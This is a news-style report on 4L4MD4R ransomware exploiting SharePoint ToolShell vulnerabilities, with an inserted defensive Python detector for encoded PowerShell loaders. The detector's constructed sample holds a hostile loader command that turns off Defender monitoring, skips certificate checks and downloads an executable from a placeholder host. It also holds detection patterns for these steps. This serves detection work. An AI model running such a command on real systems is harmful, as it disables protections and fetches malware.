Ransomware attacks on Microsoft SharePoint escalate, prompting concerns among cybersecurity experts.
Security researchers have reported a significant increase in attacks, with victim counts in the hundreds, following Microsoft's emergency mitigation for the ToolShell vulnerability. The ransomware group 4L4MD4R is the latest threat actor deploying a ransomware variant based on the open-source Mauri870 ransomware code.
4L4MD4R exploits a set of critical vulnerabilities in Microsoft SharePoint Server, collectively referred to as ToolShell. These vulnerabilities, including CVE-2025-49704, CVE-2025-49706, CVE-2025-53770, and CVE-2025-53771, allow unauthenticated remote code execution, enabling attackers to deploy malware without any credentials.
The initial deployment of 4L4MD4R was discovered following a failed exploitation attempt on July 27, 2025. An encoded PowerShell command was used to disable real-time security monitoring and bypass certificate validation on the targeted system. This loader downloaded the actual ransomware payload from a remote server hosted at .
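A defender-side check for the loader behaviour described above, added here as an example that is not from the article or from any vendor tooling: it pulls the `-EncodedCommand` argument out of a process-creation log line, decodes it (Base64 over UTF-16LE, as PowerShell expects) and flags the behaviours the article attributes to the loader. The log-line format, the sample command and the specific cmdlet and .NET names matched are constructed assumptions.

```python
import base64
import re

# Behaviours the article attributes to the loader, mapped to substrings a
# defender would expect in the decoded script (assumed indicators, not IoCs).
INDICATORS = {
    "disables real-time monitoring": re.compile(r"DisableRealtimeMonitoring", re.I),
    "bypasses certificate validation": re.compile(
        r"ServerCertificateValidationCallback|SkipCertificateCheck", re.I),
    "downloads a remote payload": re.compile(
        r"DownloadFile|DownloadString|Invoke-WebRequest", re.I),
}

# -e, -ec, -enc, -encodedcommand ... followed by a Base64 blob of plausible length.
ENC_FLAG = re.compile(r"-(?:e|ec|en[a-z]*)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded script from a -EncodedCommand argument, else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le")          # PowerShell encodes as UTF-16LE
    except (ValueError, UnicodeDecodeError):    # not Base64 / odd byte length
        return None


def analyse(cmdline):
    """List the indicator names found in a decoded command line (empty if none)."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return []
    return [name for name, rx in INDICATORS.items() if rx.search(script)]


# Constructed sample: what the loader would look like once decoded. The URL
# is a placeholder, not the server named in the article.
SAMPLE_SCRIPT = ("Set-MpPreference -DisableRealtimeMonitoring $true; "
                 "[Net.ServicePointManager]::ServerCertificateValidationCallback={$true}; "
                 "(New-Object Net.WebClient).DownloadFile('https://PLACEHOLDER.invalid/p','C:\\x.exe')")
ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode()

SAMPLE_LOGS = [  # constructed process-creation records, not real telemetry
    "4688 New Process: powershell.exe -nop -w hidden -enc " + ENCODED,
    "4688 New Process: powershell.exe -NoProfile -Command Get-Date",
]

if __name__ == "__main__":
    for line in SAMPLE_LOGS:
        print(analyse(line) or "clean", "<-", line[:60])
```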
The ransomware payload itself is UPX-packed and written in Go. During execution, it decrypts an AES-encrypted payload in memory, allocates memory to load the decrypted Portable Executable (PE) file, and creates a new thread to execute the ransomware. The ransomware encrypts the victim's files and drops two key files on the victim's desktop: (the ransom note) and (listing the encrypted files).
4L4MD4R demands a payment of 0.005 Bitcoin (BTC), which, based on current Bitcoin values in 2025, is a relatively modest demand compared to other ransomware groups. The ransom note provides a contact email () and a Bitcoin wallet address () for payment and communication. The low ransom amount suggests the attackers may aim for wide-scale infection rather than large payouts from individual victims.
The ransomware communicates with a command-and-control (C2) server ( on port 445) by sending encrypted JSON objects via POST requests, allowing the attackers to manage infected hosts remotely.
This hybrid attack campaign is part of a broader, coordinated exploitation effort targeting Microsoft SharePoint servers globally. High-profile organizations, including the US National Nuclear Security Administration, the Department of Education, Florida's Department of Revenue, the Rhode Island General Assembly, and government networks in Europe and the Middle East, have been compromised through exploitation of these flaws.
Security researchers have warned that there are likely many more victims, because not all attack vectors leave artifacts that can be scanned for. The identity and national affiliation of the group behind 4L4MD4R remain unknown at this time.
Organizations are urged to apply the Microsoft patches released in late July 2025 to protect against these attacks. It is also recommended to maintain strong security practices, including regular backups, network segmentation, and employee training on recognizing and reporting suspicious activity.
Cybersecurity professionals should prioritize remediating the critical vulnerabilities in Microsoft SharePoint Server, namely CVE-2025-49704, CVE-2025-49706, CVE-2025-53770, and CVE-2025-53771, which the ransomware group 4L4MD4R has exploited. Because these vulnerabilities enable unauthenticated remote code execution followed by data encryption, they pose a significant threat to both on-premises and cloud infrastructure.
To mitigate this threat, organizations should implement the Microsoft patches released in July 2025, maintain strong security measures such as regular backups, network segmentation, and employee training, and remain vigilant for further updates on this and future threats.